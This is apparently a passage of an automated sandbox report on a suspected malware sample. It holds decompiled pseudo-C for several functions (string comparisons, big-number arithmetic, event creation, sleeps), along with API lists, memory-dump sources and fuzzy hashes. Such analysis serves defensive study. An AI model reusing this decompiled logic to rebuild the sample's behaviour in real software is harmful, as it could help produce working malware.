                                                                                                                          														if(lstrcmpW(_v12, _t33) == 0) {
                                                                                                                          															_t83 = _v16;
                                                                                                                          															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                                                                                                          														}
                                                                                                                          														 *_t87(_v12);
                                                                                                                          													}
                                                                                                                          													_t77 = _v16;
                                                                                                                          													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                                                                                          												}
                                                                                                                          												_t72 = _v8;
                                                                                                                          												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                                                          												_v40 = _v40 + 1;
                                                                                                                          												if(_v40 < _v20) {
                                                                                                                          													continue;
                                                                                                                          												}
                                                                                                                          												goto L16;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								L16:
                                                                                                                          								_t65 = _v24;
                                                                                                                          								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                                                          							}
                                                                                                                          							 *_t87(_v28);
                                                                                                                          						}
                                                                                                                          						_t58 = _v32;
                                                                                                                          						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t118;
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                          • SysAllocString.OLEAUT32(04CDC2B0), ref: 04CD5970
                                                                                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04CD5A51
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04CD5A6A
                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 04CD5A99
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: String$Free$Alloclstrcmp
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1885612795-0
                                                                                                                          • Opcode ID: 58ac9d5cc57437ff0e558ec41608bb931eedd748e6a2e38032bbb4da4a4220d4
                                                                                                                          • Instruction ID: cdc69486dad5756b1307273485bab05a662942fb522ca079dbf4d8da36f5ffa8
                                                                                                                          • Opcode Fuzzy Hash: 58ac9d5cc57437ff0e558ec41608bb931eedd748e6a2e38032bbb4da4a4220d4
                                                                                                                          • Instruction Fuzzy Hash: FC512E75D0151AEFCB00DFA8C4889AEF7B6FF89704B148695E915EB250D731AE42CFA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 85%
                                                                                                                          			E04CD7B30(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				void _v156;
                                                                                                                          				void _v428;
                                                                                                                          				void* _t55;
                                                                                                                          				unsigned int _t56;
                                                                                                                          				signed int _t66;
                                                                                                                          				signed int _t74;
                                                                                                                          				void* _t76;
                                                                                                                          				signed int _t79;
                                                                                                                          				void* _t81;
                                                                                                                          				void* _t92;
                                                                                                                          				void* _t96;
                                                                                                                          				signed int* _t99;
                                                                                                                          				signed int _t101;
                                                                                                                          				signed int _t103;
                                                                                                                          				void* _t107;
                                                                                                                          
                                                                                                                          				_t92 = _a12;
                                                                                                                          				_t101 = __eax;
                                                                                                                          				_t55 = E04CD47C4(_a16, _t92);
                                                                                                                          				_t79 = _t55;
                                                                                                                          				if(_t79 == 0) {
                                                                                                                          					L18:
                                                                                                                          					return _t55;
                                                                                                                          				}
                                                                                                                          				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                                                                                          				_t81 = 0;
                                                                                                                          				_t96 = 0x20;
                                                                                                                          				if(_t56 == 0) {
                                                                                                                          					L4:
                                                                                                                          					_t97 = _t96 - _t81;
                                                                                                                          					_v12 = _t96 - _t81;
                                                                                                                          					E04CD227C(_t79,  &_v428);
                                                                                                                          					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E04CD3C06(_t101,  &_v428, _a8, _t96 - _t81);
                                                                                                                          					E04CD3C06(_t79,  &_v156, _a12, _t97);
                                                                                                                          					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                                                                                                          					_t66 = E04CD227C(_t101, 0x4cdd168);
                                                                                                                          					_t103 = _t101 - _t79;
                                                                                                                          					_a8 = _t103;
                                                                                                                          					if(_t103 < 0) {
                                                                                                                          						L17:
                                                                                                                          						E04CD227C(_a16, _a4);
                                                                                                                          						E04CD3450(_t79,  &_v428, _a4, _t97);
                                                                                                                          						memset( &_v428, 0, 0x10c);
                                                                                                                          						_t55 = memset( &_v156, 0, 0x84);
                                                                                                                          						goto L18;
                                                                                                                          					}
                                                                                                                          					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                                                                                                          					do {
                                                                                                                          						if(_v8 != 0xffffffff) {
                                                                                                                          							_push(1);
                                                                                                                          							_push(0);
                                                                                                                          							_push(0);
                                                                                                                          							_push( *_t99);
                                                                                                                          							L04CDAED0();
                                                                                                                          							_t74 = _t66 +  *(_t99 - 4);
                                                                                                                          							asm("adc edx, esi");
                                                                                                                          							_push(0);
                                                                                                                          							_push(_v8 + 1);
                                                                                                                          							_push(_t92);
                                                                                                                          							_push(_t74);
                                                                                                                          							L04CDAECA();
                                                                                                                          							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                                                                                          								_t74 = _t74 | 0xffffffff;
                                                                                                                          								_v16 = _v16 & 0x00000000;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							_t74 =  *_t99;
                                                                                                                          						}
                                                                                                                          						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                                                                                                          						_a12 = _t74;
                                                                                                                          						_t76 = E04CD2420(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                                                                                                          						while(1) {
                                                                                                                          							 *_t99 =  *_t99 - _t76;
                                                                                                                          							if( *_t99 != 0) {
                                                                                                                          								goto L14;
                                                                                                                          							}
                                                                                                                          							L13:
                                                                                                                          							_t92 =  &_v156;
                                                                                                                          							if(E04CD3F60(_t79, _t92, _t106) < 0) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							L14:
                                                                                                                          							_a12 = _a12 + 1;
                                                                                                                          							_t76 = E04CD2775(_t79,  &_v156, _t106, _t106);
                                                                                                                          							 *_t99 =  *_t99 - _t76;
                                                                                                                          							if( *_t99 != 0) {
                                                                                                                          								goto L14;
                                                                                                                          							}
                                                                                                                          							goto L13;
                                                                                                                          						}
                                                                                                                          						_a8 = _a8 - 1;
                                                                                                                          						_t66 = _a12;
                                                                                                                          						_t99 = _t99 - 4;
                                                                                                                          						 *(0x4cdd168 + _a8 * 4) = _t66;
                                                                                                                          					} while (_a8 >= 0);
                                                                                                                          					_t97 = _v12;
                                                                                                                          					goto L17;
                                                                                                                          				}
                                                                                                                          				while(_t81 < _t96) {
                                                                                                                          					_t81 = _t81 + 1;
                                                                                                                          					_t56 = _t56 >> 1;
                                                                                                                          					if(_t56 != 0) {
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					goto L4;
                                                                                                                          				}
                                                                                                                          				goto L4;
                                                                                                                          			}






















                                                                                                                          APIs
                                                                                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04CD7BE3
                                                                                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04CD7BF9
                                                                                                                          • memset.NTDLL ref: 04CD7CA2
                                                                                                                          • memset.NTDLL ref: 04CD7CB8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_allmul_aulldiv
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3041852380-0
                                                                                                                          • Opcode ID: b9880f77730156ae4feb95242d59bdf783ac15d9115d4c9cbb1d823caa02a8b3
                                                                                                                          • Instruction ID: b4c7af12bea27ccface5478f2676d61b129ee3e7df196fd5ae0aecc0e76cd907
                                                                                                                          • Opcode Fuzzy Hash: b9880f77730156ae4feb95242d59bdf783ac15d9115d4c9cbb1d823caa02a8b3
                                                                                                                          • Instruction Fuzzy Hash: 2A418131A01219BFEF10AF68CC40BEE7776EF45314F104569FA05A7280EB70BA549B91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 87%
                                                                                                                          			E04CD7CC7(signed int _a4, signed int* _a8) {
                                                                                                                          				void* __ecx;
                                                                                                                          				void* __edi;
                                                                                                                          				signed int _t6;
                                                                                                                          				intOrPtr _t8;
                                                                                                                          				intOrPtr _t12;
                                                                                                                          				short* _t19;
                                                                                                                          				void* _t25;
                                                                                                                          				signed int* _t28;
                                                                                                                          				CHAR* _t30;
                                                                                                                          				long _t31;
                                                                                                                          				intOrPtr* _t32;
                                                                                                                          
                                                                                                                          				_t6 =  *0x4cdd2a8; // 0xd448b889
                                                                                                                          				_t32 = _a4;
                                                                                                                          				_a4 = _t6 ^ 0x109a6410;
                                                                                                                          				_t8 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          				_t3 = _t8 + 0x4cde876; // 0x61636f4c
                                                                                                                          				_t25 = 0;
                                                                                                                          				_t30 = E04CD3CC2(_t3, 1);
                                                                                                                          				if(_t30 != 0) {
                                                                                                                          					_t25 = CreateEventA(0x4cdd2e4, 1, 0, _t30);
                                                                                                                          					E04CD4AAB(_t30);
                                                                                                                          				}
                                                                                                                          				_t12 =  *0x4cdd294; // 0x4000000a
                                                                                                                          				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04CD4A03() != 0) {
                                                                                                                          					L12:
                                                                                                                          					_t28 = _a8;
                                                                                                                          					if(_t28 != 0) {
                                                                                                                          						 *_t28 =  *_t28 | 0x00000001;
                                                                                                                          					}
                                                                                                                          					_t31 = E04CD1000(_t32, 0);
                                                                                                                          					if(_t31 == 0 && _t25 != 0) {
                                                                                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                          					}
                                                                                                                          					if(_t28 != 0 && _t31 != 0) {
                                                                                                                          						 *_t28 =  *_t28 & 0xfffffffe;
                                                                                                                          					}
                                                                                                                          					goto L20;
                                                                                                                          				} else {
                                                                                                                          					_t19 =  *0x4cdd108( *_t32, 0x20);
                                                                                                                          					if(_t19 != 0) {
                                                                                                                          						 *_t19 = 0;
                                                                                                                          						_t19 = _t19 + 2;
                                                                                                                          					}
                                                                                                                          					_t31 = E04CD5AB2(0,  *_t32, _t19, 0);
                                                                                                                          					if(_t31 == 0) {
                                                                                                                          						if(_t25 == 0) {
                                                                                                                          							L22:
                                                                                                                          							return _t31;
                                                                                                                          						}
                                                                                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                          						if(_t31 == 0) {
                                                                                                                          							L20:
                                                                                                                          							if(_t25 != 0) {
                                                                                                                          								CloseHandle(_t25);
                                                                                                                          							}
                                                                                                                          							goto L22;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					goto L12;
                                                                                                                          				}
                                                                                                                          			}















                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04CD3CC2: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,058B9B38,00000000,?,?,69B25F44,00000005,04CDD00C,?,?,04CD539B), ref: 04CD3CF8
                                                                                                                            • Part of subcall function 04CD3CC2: lstrcpy.KERNEL32(00000000,00000000), ref: 04CD3D1C
                                                                                                                            • Part of subcall function 04CD3CC2: lstrcat.KERNEL32(00000000,00000000), ref: 04CD3D24
                                                                                                                          • CreateEventA.KERNEL32(04CDD2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04CD21B6,?,00000001,?), ref: 04CD7D08
                                                                                                                            • Part of subcall function 04CD4AAB: RtlFreeHeap.NTDLL(00000000,00000000,04CD5012,00000000,?,?,00000000), ref: 04CD4AB7
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,04CD21B6,00000000,00000000,?,00000000,?,04CD21B6,?,00000001,?,?,?,?,04CD555B), ref: 04CD7D68
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,04CD21B6,?,00000001,?), ref: 04CD7D96
                                                                                                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04CD21B6,?,00000001,?,?,?,?,04CD555B), ref: 04CD7DAE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 73268831-0
                                                                                                                          • Opcode ID: 842ba9fc02cdda0c901e793f424e0557c12beb2b56e34d21eef1cd6327459a0b
                                                                                                                          • Instruction ID: 41f26bcca21032a58bd65c8f51ed4b2e19b533ed85a8f14b0fc06960cf15867d
                                                                                                                          • Opcode Fuzzy Hash: 842ba9fc02cdda0c901e793f424e0557c12beb2b56e34d21eef1cd6327459a0b
                                                                                                                          • Instruction Fuzzy Hash: D521E432A027125BD7316E689C84B7B72ABEB88B14B15072BFB47DB140DB38FD018654
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: task
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1384045349-0
                                                                                                                          • Opcode ID: 7f932cee661cacc641da44025e9e8b077a8f819ed135275e6f994e290aabbaed
                                                                                                                          • Instruction ID: b34c489cb46cc008bbadbd2723b8fe11d5cf0ab23e4e7782449adb9cfe504439
                                                                                                                          • Opcode Fuzzy Hash: 7f932cee661cacc641da44025e9e8b077a8f819ed135275e6f994e290aabbaed
                                                                                                                          • Instruction Fuzzy Hash: 4B4107B5C0025CDFDB24CFE4D940BDDBBB9BB48308F5086A9E419AB681EB755A44CF60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 40%
                                                                                                                          			E04CD2107(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				void* _v16;
                                                                                                                          				void* _v28;
                                                                                                                          				char _v32;
                                                                                                                          				void* __esi;
                                                                                                                          				void* _t29;
                                                                                                                          				void* _t38;
                                                                                                                          				signed int* _t39;
                                                                                                                          				void* _t40;
                                                                                                                          
                                                                                                                          				_t36 = __ecx;
                                                                                                                          				_v32 = 0;
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				_v12 = _a4;
                                                                                                                          				_t38 = E04CD3946(__ecx,  &_v32);
                                                                                                                          				if(_t38 != 0) {
                                                                                                                          					L12:
                                                                                                                          					_t39 = _a8;
                                                                                                                          					L13:
                                                                                                                          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                                                                                          						_t16 =  &(_t39[1]); // 0x5
                                                                                                                          						_t23 = _t16;
                                                                                                                          						if( *_t16 != 0) {
                                                                                                                          							E04CD65EA(_t23);
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					return _t38;
                                                                                                                          				}
                                                                                                                          				if(E04CD37AC(0x40,  &_v16) != 0) {
                                                                                                                          					_v16 = 0;
                                                                                                                          				}
                                                                                                                          				_t40 = CreateEventA(0x4cdd2e4, 1, 0,  *0x4cdd384);
                                                                                                                          				if(_t40 != 0) {
                                                                                                                          					SetEvent(_t40);
                                                                                                                          					Sleep(0xbb8);
                                                                                                                          					CloseHandle(_t40);
                                                                                                                          				}
                                                                                                                          				_push( &_v32);
                                                                                                                          				if(_a12 == 0) {
                                                                                                                          					_t29 = E04CD24BE(_t36);
                                                                                                                          				} else {
                                                                                                                          					_push(0);
                                                                                                                          					_push(0);
                                                                                                                          					_push(0);
                                                                                                                          					_push(0);
                                                                                                                          					_push(0);
                                                                                                                          					_t29 = E04CD282B(_t36);
                                                                                                                          				}
                                                                                                                          				_t41 = _v16;
                                                                                                                          				_t38 = _t29;
                                                                                                                          				if(_v16 != 0) {
                                                                                                                          					E04CD51BB(_t41);
                                                                                                                          				}
                                                                                                                          				if(_t38 != 0) {
                                                                                                                          					goto L12;
                                                                                                                          				} else {
                                                                                                                          					_t39 = _a8;
                                                                                                                          					_t38 = E04CD7CC7( &_v32, _t39);
                                                                                                                          					goto L13;
                                                                                                                          				}
                                                                                                                          			}













                                                                                                                          APIs
                                                                                                                          • CreateEventA.KERNEL32(04CDD2E4,00000001,00000000,00000040,00000001,?,73BCF710,00000000,73BCF730,?,?,?,04CD555B,?,00000001,?), ref: 04CD2158
                                                                                                                          • SetEvent.KERNEL32(00000000,?,?,?,04CD555B,?,00000001,?,00000002,?,?,04CD53C9,?), ref: 04CD2165
                                                                                                                          • Sleep.KERNEL32(00000BB8,?,?,?,04CD555B,?,00000001,?,00000002,?,?,04CD53C9,?), ref: 04CD2170
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,04CD555B,?,00000001,?,00000002,?,?,04CD53C9,?), ref: 04CD2177
                                                                                                                            • Part of subcall function 04CD24BE: WaitForSingleObject.KERNEL32(00000000,?,?,?,04CD2197,?,04CD2197,?,?,?,?,?,04CD2197,?), ref: 04CD2598
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2559942907-0
                                                                                                                          • Opcode ID: 81175a77b50b6e294f9115546da3b24cf1312b2c12875b918dad8d711990f493
                                                                                                                          • Instruction ID: e1bd0d090b32883b4350367a010c0e36279a55a70576e59759a3621435c1af6b
                                                                                                                          • Opcode Fuzzy Hash: 81175a77b50b6e294f9115546da3b24cf1312b2c12875b918dad8d711990f493
                                                                                                                          • Instruction Fuzzy Hash: 4221507BD00219ABDF10AFE488849AEB7BAEB4C354B0585A5EB11E7100D774FE45CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 972320c431860451d0cbb62afa00534eced5cdb7b9f37e4a289f7a9cfcfa86ca
                                                                                                                          • Instruction ID: e2ac52026d20e8d00d18fd9a0af3f1b0f91693b8afaad3d62f2c281fee02faab
                                                                                                                          • Opcode Fuzzy Hash: 972320c431860451d0cbb62afa00534eced5cdb7b9f37e4a289f7a9cfcfa86ca
                                                                                                                          • Instruction Fuzzy Hash: 1121C672A056B1EFEB515AFA8C44F5A776D9B02B60F310520E955AB2A4F631E900CDE0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 78%
                                                                                                                          			E04CD22D2(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				void* _v12;
                                                                                                                          				void* _v16;
                                                                                                                          				intOrPtr _t26;
                                                                                                                          				intOrPtr* _t28;
                                                                                                                          				intOrPtr _t31;
                                                                                                                          				intOrPtr* _t32;
                                                                                                                          				void* _t39;
                                                                                                                          				int _t46;
                                                                                                                          				intOrPtr* _t47;
                                                                                                                          				int _t48;
                                                                                                                          
                                                                                                                          				_t47 = __eax;
                                                                                                                          				_push( &_v12);
                                                                                                                          				_push(__eax);
                                                                                                                          				_t39 = 0;
                                                                                                                          				_t46 = 0;
                                                                                                                          				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                                          				_v8 = _t26;
                                                                                                                          				if(_t26 < 0) {
                                                                                                                          					L13:
                                                                                                                          					return _v8;
                                                                                                                          				}
                                                                                                                          				if(_v12 == 0) {
                                                                                                                          					Sleep(0xc8);
                                                                                                                          					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                                                                                          				}
                                                                                                                          				if(_v8 >= _t39) {
                                                                                                                          					_t28 = _v12;
                                                                                                                          					if(_t28 != 0) {
                                                                                                                          						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                                                                                          						_v8 = _t31;
                                                                                                                          						if(_t31 >= 0) {
                                                                                                                          							_t46 = lstrlenW(_v16);
                                                                                                                          							if(_t46 != 0) {
                                                                                                                          								_t46 = _t46 + 1;
                                                                                                                          								_t48 = _t46 + _t46;
                                                                                                                          								_t39 = E04CD75F6(_t48);
                                                                                                                          								if(_t39 == 0) {
                                                                                                                          									_v8 = 0x8007000e;
                                                                                                                          								} else {
                                                                                                                          									memcpy(_t39, _v16, _t48);
                                                                                                                          								}
                                                                                                                          								__imp__#6(_v16);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_t32 = _v12;
                                                                                                                          						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                                                                                          					}
                                                                                                                          					 *_a4 = _t39;
                                                                                                                          					 *_a8 = _t46 + _t46;
                                                                                                                          				}
                                                                                                                          				goto L13;
                                                                                                                          			}















                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1198164300-0
                                                                                                                          • Opcode ID: 422b064fcd1ab2eacc4c19857b5d305b872e818f53e1ad14f84bca25f0b78f31
                                                                                                                          • Instruction ID: 5dabbfe31694a82c46da6148f3fde1630b5f10c3a2f692d3d7bcba50cf88763c
                                                                                                                          • Opcode Fuzzy Hash: 422b064fcd1ab2eacc4c19857b5d305b872e818f53e1ad14f84bca25f0b78f31
                                                                                                                          • Instruction Fuzzy Hash: 02214179901209EFCB11DFA8C984E9EBBB9FF89315B1041A9E941E7210EB34EA41DB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000,00000004), ref: 6E32F29E
                                                                                                                          • _free.LIBCMT ref: 6E32F2FB
                                                                                                                          • _free.LIBCMT ref: 6E32F331
                                                                                                                          • SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000), ref: 6E32F33C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2283115069-0
                                                                                                                          • Opcode ID: c5d54cabbce9b44703cf292d21172454f27e5a64a1b6c79e008530231cd89d3f
                                                                                                                          • Instruction ID: 0d6434f6b54fb192c635a745ec2053ecfa29ca4017bc12bd6cd36aea464e9b96
                                                                                                                          • Opcode Fuzzy Hash: c5d54cabbce9b44703cf292d21172454f27e5a64a1b6c79e008530231cd89d3f
                                                                                                                          • Instruction Fuzzy Hash: 71110636214A626EEB411AF49CC0DAB329D9BC2779B350A34F2F4A61C0EF22C805C160
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(?,?,?,6E318835,6E32F53A,?,?,6E2E565E,000008BB,6E37A0D4), ref: 6E32F3F5
                                                                                                                          • _free.LIBCMT ref: 6E32F452
                                                                                                                          • _free.LIBCMT ref: 6E32F488
                                                                                                                          • SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,?,?,6E318835,6E32F53A,?,?,6E2E565E,000008BB,6E37A0D4), ref: 6E32F493
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2283115069-0
                                                                                                                          • Opcode ID: 8b27cbac1f335dfb4338a2d40ee583e072ec55d174ec942082e10cdbaa2cb04f
                                                                                                                          • Instruction ID: 62b231322e250cb7cdf5cb1df1f20cdf6531a7838ba9be3fe84c5243a7b01c4b
                                                                                                                          • Opcode Fuzzy Hash: 8b27cbac1f335dfb4338a2d40ee583e072ec55d174ec942082e10cdbaa2cb04f
                                                                                                                          • Instruction Fuzzy Hash: BC110C327149616EEB612AF99C80DAB33ADABC2779B740A34F5F4A61C0EF71C804C520
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F039A
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03A6
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03B2
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03C1
                                                                                                                          • task.LIBCPMTD ref: 6E2EF87F
                                                                                                                          • task.LIBCPMTD ref: 6E2EF88B
                                                                                                                          • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E2EF8A0
                                                                                                                          • task.LIBCPMTD ref: 6E2EF8B8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2520070614-0
                                                                                                                          • Opcode ID: a069ca92dd21cf5a51658edc304eed40881dd856149aafa134e30076ce0b04bb
                                                                                                                          • Instruction ID: f71008d6646097940dd21a7758dc19470aaceb32bf6d5a2284920cf086d7526b
                                                                                                                          • Opcode Fuzzy Hash: a069ca92dd21cf5a51658edc304eed40881dd856149aafa134e30076ce0b04bb
                                                                                                                          • Instruction Fuzzy Hash: 2B214A75D0025CEBCB04CFE4C840BDEBBB9BF48314F508569E429AB684DB306A05CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F039A
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03A6
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03B2
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03C1
                                                                                                                          • task.LIBCPMTD ref: 6E2EF95F
